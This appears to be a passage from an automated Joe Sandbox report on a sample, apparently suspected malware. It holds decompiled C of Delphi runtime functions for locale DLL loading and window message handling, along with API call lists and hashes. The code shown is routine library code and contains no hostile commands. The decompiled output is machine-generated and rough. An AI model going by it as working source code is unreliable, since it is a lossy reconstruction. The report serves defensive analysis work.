RtlLeaveCriticalSection 38732->38733 38734 401c2b RtlDeleteCriticalSection 38732->38734 38733->38734 38734->38708 38735->38719 38736->38719 38737 451578 38738 451584 ShowOwnedPopups 38737->38738 38739 45158c 38737->38739 38738->38739 38742 421d84 38739->38742 38745 421d8b 38742->38745 38743 421dd4 38745->38743 38746 41ad54 38745->38746 38747 41ac6c 13 API calls 38746->38747 38748 41ad5d 38747->38748 38748->38745

                                                    Executed Functions

                                                    Function 004061D0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 65%
                                                    			E004061D0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4062d5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00406018( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040643C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004062DC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L0040131C();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401324();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L0040131C();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L0040131C();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L0040131C();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























                                                    0x004061d1
                                                    0x004061d3
                                                    0x004061db
                                                    0x004061ec
                                                    0x004061f1
                                                    0x0040620a
                                                    0x00406211
                                                    0x00406253
                                                    0x00406255
                                                    0x00406256
                                                    0x0040625b
                                                    0x0040625e
                                                    0x00406261
                                                    0x00406273
                                                    0x00406296
                                                    0x004062b6
                                                    0x004062b6
                                                    0x004062ba
                                                    0x004062c0
                                                    0x004062c3
                                                    0x004062c6
                                                    0x004062d4
                                                    0x00406213
                                                    0x00406228
                                                    0x0040622f
                                                    0x00000000
                                                    0x00406231
                                                    0x00406246
                                                    0x0040624d
                                                    0x004062dc
                                                    0x004062e4
                                                    0x004062eb
                                                    0x004062ec
                                                    0x004062ff
                                                    0x00406304
                                                    0x0040630d
                                                    0x00406323
                                                    0x00406329
                                                    0x0040632a
                                                    0x00406337
                                                    0x0040633c
                                                    0x0040633b
                                                    0x0040633b
                                                    0x0040634b
                                                    0x00406353
                                                    0x00406359
                                                    0x0040635e
                                                    0x0040636b
                                                    0x0040636f
                                                    0x00406370
                                                    0x00406371
                                                    0x00406386
                                                    0x00406386
                                                    0x0040638a
                                                    0x004063a3
                                                    0x004063a7
                                                    0x004063a8
                                                    0x004063a9
                                                    0x004063b9
                                                    0x004063be
                                                    0x004063c2
                                                    0x004063c4
                                                    0x004063d9
                                                    0x004063dd
                                                    0x004063de
                                                    0x004063df
                                                    0x004063ef
                                                    0x004063f4
                                                    0x004063f4
                                                    0x004063c2
                                                    0x0040638a
                                                    0x00406353
                                                    0x004063fd
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040624d
                                                    0x0040622f

                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001), ref: 0040620A
                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000), ref: 00406228
                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                    • RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                    • RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                    • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                    • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                    • API String ID: 1759228003-2375825460
                                                    • Opcode ID: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                    • Instruction ID: 811a2f83ad3c420e2a37c3e1c64e1457f6d65cd41ace4c5469d47de9f0911395
                                                    • Opcode Fuzzy Hash: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                    • Instruction Fuzzy Hash: 60517375A4025C7EFB21D6A48C46FEF77AC9B04744F4100BBBA05F61C2E6789E548BA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00459934 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 401COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 25 459934-459968 26 45999c-4599b1 call 4597e8 25->26 27 45996a-45996b 25->27 32 459a65-459a6a 26->32 33 4599b7 26->33 29 45996d-459989 call 41ac6c 27->29 49 459998-45999a 29->49 50 45998b-459993 29->50 35 459a6c 32->35 36 459abb-459ac0 32->36 37 459f03-459f18 call 45aae4 33->37 38 4599bd-4599c0 33->38 43 459a72-459a77 35->43 44 459ddb-459de3 35->44 39 459ae1-459ae6 36->39 40 459ac2 36->40 54 459fe4-459fec 37->54 45 4599c2 38->45 46 459a2c-459a2f 38->46 52 459f56-459f5d 39->52 53 459aec-459af2 39->53 47 459f1d-459f24 40->47 48 459ac8-459acd 40->48 56 459aa2-459aa7 43->56 57 459a79 43->57 44->54 55 459de9-459df4 call 441704 44->55 58 459cc8-459ccf 45->58 59 4599c8-4599cb 45->59 60 459a31 46->60 61 459a4e-459a51 46->61 74 459f26-459f39 call 45a5a4 47->74 75 459f3e-459f51 call 45a600 47->75 63 459ec4-459ed2 IsIconic 48->63 64 459ad3-459ad6 48->64 49->26 49->29 65 45a003-45a009 50->65 79 459f70-459f7f 52->79 80 459f5f-459f6e 52->80 66 459d98-459db4 call 45ba10 53->66 67 459af8 53->67 54->65 55->54 115 459dfa-459e09 call 441704 IsWindowEnabled 55->115 81 459aad-459ab0 56->81 82 459e9c-459ea7 56->82 77 459e74-459e7f 57->77 78 459a7f-459a84 57->78 58->54 62 459cd5-459cdf 58->62 68 4599d1 59->68 69 459fdd-459fde call 4598ac 59->69 70 459fa7-459fb8 call 458dec call 4598ac 60->70 71 459a37-459a3a 60->71 72 459a57-459a5a 61->72 73 459b93-459ba1 call 45a038 61->73 62->54 63->54 87 459ed8-459ee3 GetFocus 63->87 64->37 83 459adc 64->83 66->54 67->69 68->46 113 459fe3 69->113 70->54 89 459f81-459fa5 call 445ed0 call 459840 call 4598ac 71->89 90 459a40-459a43 71->90 91 459ce4-459cf0 72->91 92 459a60 72->92 73->54 74->54 75->54 77->54 84 459e85-459e97 77->84 97 459a86-459a8c 78->97 98 459afd-459b0d 78->98 79->54 80->54 100 459ab6 81->100 101 459db9-459dc6 call 45a47c 81->101 82->54 86 459ead-459ebf 82->86 83->69 84->54 86->54 87->54 107 459ee9-459ef2 call 451750 87->107 89->54 109 459bc7-459be8 call 4598ac 90->109 110 459a49 90->110 91->54 103 459cf6-459d00 91->103 92->69 116 459a92-459a97 97->116 117 459c9c-459cc3 SendMessageA 97->117 105 459b0f-459b14 98->105 106 459b18-459b20 call 45a054 98->106 100->69 101->54 142 459dcc-459dd6 101->142 103->54 120 459d06-459d10 103->120 123 459b25-459b2d call 45a104 105->123 124 459b16-459b39 call 4598ac 105->124 106->54 107->54 150 459ef8-459efe SetFocus 107->150 151 459c0c-459c29 call 45973c PostMessageA 109->151 152 459bea-459c07 call 45974c PostMessageA 109->152 110->69 113->54 115->54 153 459e0f-459e1e call 441704 IsWindowVisible 115->153 131 459a9d 116->131 132 459fba-459fc6 call 4328f8 call 4329d8 116->132 117->54 134 459d12-459d2e call 40edc4 120->134 135 459d8b-459d93 120->135 123->54 124->54 131->69 132->54 169 459fc8-459fd2 call 4328f8 call 432a34 132->169 162 459d70-459d86 GetLastError 134->162 163 459d30-459d52 GetProcAddress 134->163 135->54 142->54 150->54 151->54 152->54 153->54 170 459e24-459e6f GetFocus call 441704 SetFocus call 43c130 SetFocus 153->170 162->54 163->54 168 459d58-459d6b 163->168 168->54 169->54 170->54
                                                    C-Code - Quality: 94%
                                                    			E00459934(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				void* _t166;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t239;
				struct HWND__* _t247;
				struct HWND__* _t250;
				struct HWND__* _t254;
				struct HWND__* _t256;
				struct HWND__* _t257;
				struct HWND__* _t269;
				intOrPtr _t272;
				struct HWND__* _t275;
				intOrPtr* _t276;
				struct HWND__* _t284;
				struct HWND__* _t286;
				struct HWND__* _t297;
				void* _t306;
				signed int _t308;
				struct HWND__* _t314;
				struct HWND__* _t315;
				struct HWND__* _t316;
				void* _t317;
				intOrPtr _t340;
				struct HWND__* _t344;
				intOrPtr _t366;
				void* _t370;
				struct HWND__* _t375;
				void* _t376;
				void* _t377;
				intOrPtr _t378;

				_t317 = __ecx;
				_push(_t370);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x459fee);
				_push( *[fs:edx]);
				 *[fs:edx] = _t378;
				 *(_v12 + 0xc) = 0;
				_t306 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t306 < 0) {
					L5:
					E004597E8(_v8, _t317, _v12);
					_t308 =  *_v12;
					_t161 = _t308;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L102:
									_t166 = 0;
									_pop(_t340);
									 *[fs:eax] = _t340;
									goto L103;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = L0045BA10(_v8,  *(_v12 + 8), _t308) & 0x0000007f;
								} else {
									L101:
									E004598AC(_t377); // executed
								}
								goto L102;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E0045A600(_v8, _t317,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E0045A5A4(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L102;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t344 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t344 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t344 + 0x30))) {
										_t191 = E00451750(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L102;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L89:
								E0045AAE4(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t372 = _t197;
								_t199 = E00441704(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E00441704(_t372));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E00441704(_t372));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x49be6c = 0;
											_t206 = GetFocus();
											SetFocus(E00441704(_t372));
											E0043C130(_t372,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x49be6c = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L102;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0x10a));
								if( *((short*)(_t217 + 0x10a)) != 0) {
									 *((intOrPtr*)(_v8 + 0x108))();
								}
								goto L102;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E0045A47C(_v8, _t317, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0x112));
							if( *((short*)(_t224 + 0x112)) != 0) {
								 *((intOrPtr*)(_v8 + 0x110))();
							}
							goto L102;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E0045A054(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E0045A104(_v8);
								} else {
									E004598AC(_t377);
								}
							}
							goto L102;
						}
						_t239 = _t227 + 0xffffffe0 - 7;
						__eflags = _t239;
						if(_t239 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t308 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L102;
						}
						__eflags = _t239 == 0x1e1;
						if(_t239 == 0x1e1) {
							_t247 = E004329D8(E004328F8());
							__eflags = _t247;
							if(_t247 != 0) {
								E00432A34(E004328F8());
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						goto L89;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t250 = _t161 - 0x37;
							__eflags = _t250;
							if(_t250 == 0) {
								 *(_v12 + 0xc) = E0045A038(_v8);
								goto L102;
							}
							__eflags = _t250 == 0x13;
							if(_t250 == 0x13) {
								_t254 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
									_t256 = _v8;
									__eflags =  *((char*)(_t256 + 0x9e));
									if( *((char*)(_t256 + 0x9e)) != 0) {
										_t257 = _v8;
										__eflags =  *(_t257 + 0xa0);
										if( *(_t257 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t314 = E0040EDC4("vcltest3.dll", _t308, 0x8000);
											 *(_v8 + 0xa0) = _t314;
											__eflags = _t314;
											if(_t314 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t375 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_t315 = _t375;
												__eflags = _t375;
												if(_t375 != 0) {
													_t269 =  *(_v12 + 8);
													_t315->i( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
												}
											}
										}
									}
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t272 =  *0x49ebbc; // 0x0
							E00458DEC(_t272);
							E004598AC(_t377);
							goto L102;
						}
						_t275 = _t161 - 0x1a;
						__eflags = _t275;
						if(_t275 == 0) {
							_t276 =  *0x49ddb0; // 0x49eb18
							L00445ED0( *_t276, _t317,  *(_v12 + 4));
							E00459840(_v8, _t308, _t317, _v12, _t370);
							E004598AC(_t377);
							goto L102;
						}
						__eflags = _t275 == 2;
						if(_t275 == 2) {
							E004598AC(_t377);
							_t284 = _v12;
							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
							_t286 = _v12;
							__eflags =  *(_t286 + 4);
							if( *(_t286 + 4) == 0) {
								E0045973C();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E0045974C(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						_t297 = _v12;
						__eflags =  *(_t297 + 4);
						if( *(_t297 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L102;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L101;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M004599D8))) {
						case 0:
							0 = E004214B8(0, __ebx, __edi, __esi);
							goto L102;
						case 1:
							goto L101;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L00407848();
							__eax = E004598AC(__ebp);
							goto L102;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E004598AC(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E00451600( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L00459744();
							} else {
								_v8 = E0045974C(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E004598AC(__ebp);
							}
							goto L102;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L004077A8();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E004598AC(__ebp);
							} else {
								__eax = L004598E8(__ebp);
							}
							goto L102;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00456FEC(__eax, __ecx);
							}
							goto L102;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E004598AC(__ebp);
							goto L102;
					}
				} else {
					_t316 = _t306 + 1;
					_t376 = 0;
					L2:
					L2:
					if( *((intOrPtr*)(E0041AC6C( *((intOrPtr*)(_v8 + 0xa8)), _t376)))() == 0) {
						goto L4;
					} else {
						_t166 = 0;
						_pop(_t366);
						 *[fs:eax] = _t366;
					}
					L103:
					return _t166;
					L4:
					_t376 = _t376 + 1;
					_t316 = _t316 - 1;
					__eflags = _t316;
					if(_t316 != 0) {
						goto L2;
					}
					goto L5;
				}
			}























































                                                    0x00459934
                                                    0x0045993b
                                                    0x0045993d
                                                    0x00459940
                                                    0x00459945
                                                    0x00459946
                                                    0x0045994b
                                                    0x0045994e
                                                    0x00459956
                                                    0x00459965
                                                    0x00459968
                                                    0x0045999c
                                                    0x004599a2
                                                    0x004599aa
                                                    0x004599ac
                                                    0x004599ae
                                                    0x004599b1
                                                    0x00459a65
                                                    0x00459a6a
                                                    0x00459abb
                                                    0x00459ac0
                                                    0x00459ae1
                                                    0x00459ae1
                                                    0x00459ae6
                                                    0x00459f56
                                                    0x00459f59
                                                    0x00459f5d
                                                    0x00459f79
                                                    0x00459f5f
                                                    0x00459f6b
                                                    0x00459f6b
                                                    0x00459fe4
                                                    0x00459fe4
                                                    0x00459fe6
                                                    0x00459fe9
                                                    0x00000000
                                                    0x00459fe9
                                                    0x00459aef
                                                    0x00459af2
                                                    0x00459db1
                                                    0x00459af8
                                                    0x00459fdd
                                                    0x00459fde
                                                    0x00459fe3
                                                    0x00000000
                                                    0x00459af2
                                                    0x00459ac2
                                                    0x00459f1d
                                                    0x00459f20
                                                    0x00459f24
                                                    0x00459f4c
                                                    0x00459f26
                                                    0x00459f34
                                                    0x00459f34
                                                    0x00000000
                                                    0x00459f24
                                                    0x00459ac8
                                                    0x00459ac8
                                                    0x00459acd
                                                    0x00459ecb
                                                    0x00459ed0
                                                    0x00459ed2
                                                    0x00459ed8
                                                    0x00459edd
                                                    0x00459ee0
                                                    0x00459ee3
                                                    0x00459eeb
                                                    0x00459ef0
                                                    0x00459ef2
                                                    0x00459ef9
                                                    0x00459ef9
                                                    0x00459ef2
                                                    0x00459ee3
                                                    0x00000000
                                                    0x00459ed2
                                                    0x00459ad3
                                                    0x00459ad6
                                                    0x00459f03
                                                    0x00459f13
                                                    0x00000000
                                                    0x00459adc
                                                    0x00000000
                                                    0x00459adc
                                                    0x00459ad6
                                                    0x00459a6c
                                                    0x00459dde
                                                    0x00459de1
                                                    0x00459de3
                                                    0x00459de9
                                                    0x00459ded
                                                    0x00459df2
                                                    0x00459df4
                                                    0x00459e02
                                                    0x00459e07
                                                    0x00459e09
                                                    0x00459e17
                                                    0x00459e1c
                                                    0x00459e1e
                                                    0x00459e24
                                                    0x00459e2b
                                                    0x00459e3a
                                                    0x00459e53
                                                    0x00459e59
                                                    0x00459e5e
                                                    0x00459e68
                                                    0x00459e68
                                                    0x00459e1e
                                                    0x00459e09
                                                    0x00459df4
                                                    0x00000000
                                                    0x00459de3
                                                    0x00459a72
                                                    0x00459a77
                                                    0x00459aa2
                                                    0x00459aa2
                                                    0x00459aa7
                                                    0x00459e9c
                                                    0x00459e9f
                                                    0x00459ea7
                                                    0x00459eb9
                                                    0x00459eb9
                                                    0x00000000
                                                    0x00459ea7
                                                    0x00459aad
                                                    0x00459ab0
                                                    0x00459dbf
                                                    0x00459dc4
                                                    0x00459dc6
                                                    0x00459dcf
                                                    0x00459dcf
                                                    0x00000000
                                                    0x00459ab6
                                                    0x00000000
                                                    0x00459ab6
                                                    0x00459ab0
                                                    0x00459a79
                                                    0x00459e74
                                                    0x00459e77
                                                    0x00459e7f
                                                    0x00459e91
                                                    0x00459e91
                                                    0x00000000
                                                    0x00459e7f
                                                    0x00459a7f
                                                    0x00459a7f
                                                    0x00459a84
                                                    0x00459b08
                                                    0x00459b08
                                                    0x00459b0d
                                                    0x00459b1b
                                                    0x00459b0f
                                                    0x00459b0f
                                                    0x00459b14
                                                    0x00459b28
                                                    0x00459b16
                                                    0x00459b33
                                                    0x00459b38
                                                    0x00459b14
                                                    0x00000000
                                                    0x00459b0d
                                                    0x00459a89
                                                    0x00459a89
                                                    0x00459a8c
                                                    0x00459cc0
                                                    0x00000000
                                                    0x00459cc0
                                                    0x00459a92
                                                    0x00459a97
                                                    0x00459fbf
                                                    0x00459fc4
                                                    0x00459fc6
                                                    0x00459fcd
                                                    0x00459fcd
                                                    0x00000000
                                                    0x00459a9d
                                                    0x00000000
                                                    0x00459a9d
                                                    0x00459a97
                                                    0x004599b7
                                                    0x00000000
                                                    0x00000000
                                                    0x004599bd
                                                    0x004599c0
                                                    0x00459a2c
                                                    0x00459a2f
                                                    0x00459a4e
                                                    0x00459a4e
                                                    0x00459a51
                                                    0x00459b9e
                                                    0x00000000
                                                    0x00459b9e
                                                    0x00459a57
                                                    0x00459a5a
                                                    0x00459ce4
                                                    0x00459cea
                                                    0x00459cf0
                                                    0x00459cf6
                                                    0x00459cf9
                                                    0x00459d00
                                                    0x00459d06
                                                    0x00459d09
                                                    0x00459d10
                                                    0x00459d90
                                                    0x00459d12
                                                    0x00459d21
                                                    0x00459d26
                                                    0x00459d2c
                                                    0x00459d2e
                                                    0x00459d78
                                                    0x00459d80
                                                    0x00459d30
                                                    0x00459d35
                                                    0x00459d4c
                                                    0x00459d4e
                                                    0x00459d50
                                                    0x00459d52
                                                    0x00459d5b
                                                    0x00459d69
                                                    0x00459d69
                                                    0x00459d52
                                                    0x00459d2e
                                                    0x00459d10
                                                    0x00459d00
                                                    0x00000000
                                                    0x00459a60
                                                    0x00000000
                                                    0x00459a60
                                                    0x00459a5a
                                                    0x00459a31
                                                    0x00459fa7
                                                    0x00459fac
                                                    0x00459fb2
                                                    0x00000000
                                                    0x00459fb7
                                                    0x00459a37
                                                    0x00459a37
                                                    0x00459a3a
                                                    0x00459f87
